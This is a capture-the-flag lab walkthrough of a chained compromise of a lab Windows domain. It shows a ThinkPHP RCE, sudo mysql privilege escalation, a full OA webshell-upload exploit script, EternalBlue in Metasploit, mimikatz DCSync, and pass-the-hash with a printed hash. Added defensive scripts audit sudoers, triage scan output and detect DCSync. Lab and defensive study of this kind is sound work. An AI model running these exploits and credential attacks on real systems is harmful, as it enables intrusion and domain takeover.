Initial

Flag01

Target IP: 39.101.196.35

The site turns out to be ThinkPHP.

It has the ThinkPHP 5.0.23 RCE, which is used to get a shell.

Connecting with AntSword (蚁剑) works, but reading /root needs privilege escalation.

Try sudo privilege escalation.

sudo privilege escalation via mysql

Reference: Linux privilege escalation via sudo, 70 methods - 简单安全 (huangmj.com)
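The defender's counterpart to this step is auditing sudoers for NOPASSWD rules on binaries that can spawn a shell (mysql's `\!` being the one used here). The Python script below is an added example, not part of this write-up or of the referenced article; it parses a constructed sudoers sample (not the target's real file) and reports the rules that hand out a root shell without a password. The list of shell-escape binaries is an assumption to extend for your own environment.

```python
import re

# Binaries that can run arbitrary commands once they run as root (mysql via
# "\! <cmd>", as in this write-up; the rest are well-known shell escapes).
# Assumed starting list; extend it for your environment.
SHELL_ESCAPES = {"mysql", "vim", "vi", "nano", "less", "more", "find", "awk",
                 "perl", "python", "python3", "bash", "sh", "env", "tar", "zip"}

# Constructed sample sudoers content (not the target's real file).
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults env_reset
root    ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: /usr/bin/mysql
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, \\
                            /usr/bin/tar
deploy  ALL=(ALL) /usr/bin/systemctl restart app
ops     ALL=(ALL) NOPASSWD: ALL
"""

# user  hosts=(runas) [TAG:] commands
ENTRY_RE = re.compile(r"^(\S+)\s+([^\s=]+)\s*=\s*(?:\(([^)]*)\))?\s*(.*)$")
TAG_RE = re.compile(r"^([A-Z]+):\s*(.*)$")


def _logical_lines(text):
    """Join backslash-continued lines and drop comments and blank lines."""
    buf = ""
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.endswith("\\"):
            buf += line[:-1]
            continue
        buf += line
        stripped = buf.strip()
        buf = ""
        if stripped and not stripped.startswith("#"):
            yield stripped


def parse_sudoers(text):
    """Return (user, runas, nopasswd, [commands]) for each user specification."""
    entries = []
    for line in _logical_lines(text):
        if line.startswith("Defaults"):
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        user, _hosts, runas, cmdspec = m.groups()
        nopasswd = False
        # Tags such as NOPASSWD: / PASSWD: / SETENV: prefix the command list.
        while (tm := TAG_RE.match(cmdspec)):
            if tm.group(1) == "NOPASSWD":
                nopasswd = True
            cmdspec = tm.group(2)
        commands = [c.strip() for c in cmdspec.split(",") if c.strip()]
        entries.append((user, runas or "root", nopasswd, commands))
    return entries


def risky_entries(text):
    """Rules that give a non-root user a root shell without a password."""
    findings = []
    for user, runas, nopasswd, commands in parse_sudoers(text):
        if user == "root" or not nopasswd:
            continue
        for cmd in commands:
            binary = cmd.split()[0].rsplit("/", 1)[-1]   # /usr/bin/mysql -> mysql
            if cmd == "ALL" or binary in SHELL_ESCAPES:
                findings.append((user, runas, cmd))
    return findings


if __name__ == "__main__":
    for user, runas, cmd in risky_entries(SAMPLE_SUDOERS):
        print(f"{user} can run {cmd} as {runas} without a password: shell escape possible")
```

The parser understands the backslash continuations and tag prefixes that sudoers allows, but not aliases (User_Alias, Cmnd_Alias), which would need expanding first; point it at /etc/sudoers and the /etc/sudoers.d fragments together.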

Look for files with "flag" in the name:

sudo mysql -e '\! find / -type f -name "*flag*" 2>/dev/null'

Read the file:

sudo mysql -e '\! cat /root/flag/flag01.txt'

This gives flag01; the hint says the next flag is on the internal network.

flag01: flag{60b53231-

Flag02

Check the network interfaces.

First upload fscan and scan the internal network:

./fscan -h 172.22.1.1/24 -o result.txt

The results:
172.22.1.21:139 open
172.22.1.18:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:22 open
172.22.1.2:88 open
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.15:80 open
[*] WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] NetInfo
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] NetInfo
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] NetInfo
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

172.22.1.2   DC01, the domain controller
172.22.1.21  MS17-010 (EternalBlue)
172.22.1.18  信呼 OA system
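To triage output like the above without reading it line by line, here is an added Python example (not part of the write-up, and not an fscan feature) that parses the fscan text format into a per-host record and lists the hosts with a confirmed finding, which is the order in which a defender would patch or isolate them. The sample input is an excerpt copied from the scan result above; the regular expressions are written against the line shapes shown there (port lines, NetInfo blocks, OsInfo, NetBios, WebTitle, MS17-010 and PocScan lines) and are an assumption for any other fscan message type.

```python
import re
from collections import defaultdict

# Excerpt of the fscan result shown above; enough lines to exercise every parser branch.
SAMPLE = """\
172.22.1.21:139 open
172.22.1.18:80 open
172.22.1.2:88 open
172.22.1.18:3306 open
172.22.1.15:22 open
172.22.1.15:80 open
[*] WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] NetInfo
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
"""

IP = r"\d{1,3}(?:\.\d{1,3}){3}"
PORT_RE = re.compile(rf"^({IP}):(\d+) open$")
WEB_RE = re.compile(r"^\[\*\] WebTitle https?://([^/?\s]+)\S* code:(\d+) len:\d+ title:(.*)$")
OS_RE = re.compile(rf"^\[\*\] OsInfo ({IP}) \((.*)\)$")
NETBIOS_RE = re.compile(rf"^\[\*\] NetBios ({IP}) (\[\+\] DC:)?(\S+)")
VULN_RE = re.compile(rf"^\[\+\] (\S+) ({IP})(?: \((.*)\))?$")   # e.g. "[+] MS17-010 <ip> (<os>)"
POC_RE = re.compile(r"^\[\+\] PocScan https?://([^/?\s]+)\S* (\S+)")


def _host():
    return {"ports": set(), "os": None, "fqdn": None, "netbios": None,
            "dc": False, "web": [], "findings": []}


def parse_fscan(text):
    """Parse fscan's text output into {ip: record}."""
    hosts = defaultdict(_host)
    lines = [l.rstrip() for l in text.splitlines()]
    i = 0
    while i < len(lines):
        line = lines[i]
        i += 1
        if (m := PORT_RE.match(line)):
            hosts[m.group(1)]["ports"].add(int(m.group(2)))
        elif line == "[*] NetInfo":
            # Block form: "[*]<ip>" followed by "[->]<name>" and "[->]<ip>" lines.
            if i < len(lines) and lines[i].startswith("[*]"):
                ip = lines[i][3:].strip()
                i += 1
                while i < len(lines) and lines[i].startswith("[->]"):
                    value = lines[i][4:].strip()
                    if not re.fullmatch(IP, value):
                        hosts[ip]["netbios"] = value
                    i += 1
        elif (m := WEB_RE.match(line)):
            host, code, title = m.group(1), int(m.group(2)), m.group(3)
            if not title.startswith("None"):        # redirect lines carry no real title
                hosts[host]["web"].append((code, title))
        elif (m := OS_RE.match(line)):
            hosts[m.group(1)]["os"] = m.group(2)
        elif (m := NETBIOS_RE.match(line)):
            hosts[m.group(1)]["fqdn"] = m.group(3)
            hosts[m.group(1)]["dc"] = m.group(2) is not None
        elif (m := POC_RE.match(line)):
            hosts[m.group(1)]["findings"].append(m.group(2))
        elif (m := VULN_RE.match(line)):
            h = hosts[m.group(2)]
            h["findings"].append(m.group(1))
            h["os"] = h["os"] or m.group(3)
    return dict(hosts)


def risky_hosts(hosts):
    """Hosts with a confirmed vulnerability or PoC hit, sorted by IP."""
    return sorted((ip, h["findings"]) for ip, h in hosts.items() if h["findings"])


def summarize(hosts):
    """One line per host, in numeric IP order."""
    def key(ip):
        return tuple(int(p) for p in ip.split("."))
    out = []
    for ip in sorted(hosts, key=key):
        h = hosts[ip]
        name = h["fqdn"] or h["netbios"] or "-"
        tag = " [DC]" if h["dc"] else ""
        out.append(f"{ip} {name}{tag} os={h['os'] or '?'} ports={sorted(h['ports'])} "
                   f"web={[t for _, t in h['web']]} findings={h['findings']}")
    return out


if __name__ == "__main__":
    parsed = parse_fscan(SAMPLE)
    for row in summarize(parsed):
        print(row)
    print("needs attention first:", risky_hosts(parsed))
```

Feed it the full result.txt and the summary reproduces the three-line triage above (domain controller, EternalBlue-vulnerable host, OA server) without hand-reading the duplicated output.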

Set up a proxy:

./gost -L=:10000

This starts an HTTP/SOCKS5 proxy: gost listens on port 10000 of the pivot host, and Proxifier is later pointed at the pivot's IP and port 10000.

The internal site can now be opened in a browser normally.

A ready-made exploit for the OA system was found online:

# 1.php is the webshell that gets uploaded

# Change the following before use:
# url_pre = 'http://<IP>/'
# 'adminuser': '<ADMINUSER_BASE64>',
# 'adminpass': '<ADMINPASS_BASE64>',

import requests

session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
# url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=<ID>'
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}

r = session.post(url1, data=data1)                 # log in with the admin credentials
with open('1.php', 'rb') as f:                      # upload the webshell (binary mode)
    r = session.post(url2, files={'file': f})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'   # final path once the .uptemp upload is renamed
print(filepath)
file_id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={file_id}'
r = session.get(url3)                               # trigger the task that turns the upload into .php
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

Connect with AntSword.

This gives flag02.

flag02: 2ce3-4813-87d4-

Flag03

172.22.1.21 is vulnerable to MS17-010, so it is simply a matter of using msf.

First configure the SOCKS5 proxy for msf (via proxychains):

vim /etc/proxychains4.conf

proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

The session comes back (it takes a few minutes).

An EternalBlue session already runs as SYSTEM, so mimikatz can be used to collect the hashes of domain users:

load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
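From the blue-team side, the lsadump::dcsync step above is exactly what a DCSync detection should catch: the account asks the domain controller for directory replication, which the DC logs as Security event 4662 with the DS-Replication-Get-Changes control-access rights in the Properties field. The Python below is an added example, not from this write-up: it runs that check over constructed sample events (simplified dicts whose keys follow the event's EventData field names; the shape your collector emits may differ) and excludes machine accounts, which replicate legitimately, plus an explicit allowlist for known replication service accounts. The extended-rights GUIDs are the standard Active Directory ones.

```python
import re

# Extended-rights GUIDs that appear in the 4662 "Properties" field when an
# account requests directory replication (the rights a DCSync needs).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

GUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")

# Constructed sample events (simplified dict form, not real log records).
SAMPLE_EVENTS = [
    # Normal replication between domain controllers: machine account, expected.
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectDomainName": "XIAORANG",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A user account obtaining replication rights: what lsadump::dcsync produces.
    {"EventID": 4662, "SubjectUserName": "administrator", "SubjectDomainName": "XIAORANG",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Ordinary object access with an unrelated, made-up property GUID.
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "XIAORANG",
     "Properties": "%%7685\n\t{00000000-1111-2222-3333-444444444444}"},
    # Different event type, ignored.
    {"EventID": 4624, "SubjectUserName": "jdoe", "SubjectDomainName": "XIAORANG"},
]


def detect_dcsync(events, allowlist=()):
    """One alert per 4662 event in which a non-machine account obtained replication rights."""
    allowed = {a.lower() for a in allowlist}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = guids & set(REPLICATION_RIGHTS)
        if not rights:
            continue
        user = ev.get("SubjectUserName", "")
        # Domain controllers replicate with each other through their machine
        # accounts ($); other legitimate replication consumers (for example a
        # directory sync service account) belong on the allowlist.
        if user.endswith("$") or user.lower() in allowed:
            continue
        alerts.append({
            "user": f"{ev.get('SubjectDomainName', '')}\\{user}",
            "rights": sorted(REPLICATION_RIGHTS[g] for g in rights),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS):
        print(f"replication rights used by non-DC account {alert['user']}: "
              f"{', '.join(alert['rights'])}")
```

Event 4662 is only written when auditing of directory service access is enabled and the domain object's SACL audits Control Access for Everyone, so check that configuration before relying on this rule; a shorter-term mitigation for the lab above is that the Administrator hash should never be usable from a compromised member server in the first place (tiered admin accounts, no interactive domain-admin logons on workstations or member servers).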

Then pass-the-hash with crackmapexec to take the domain controller:

proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

This gives flag03.

flag03: e8f88d0d43d6}

FLAG

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}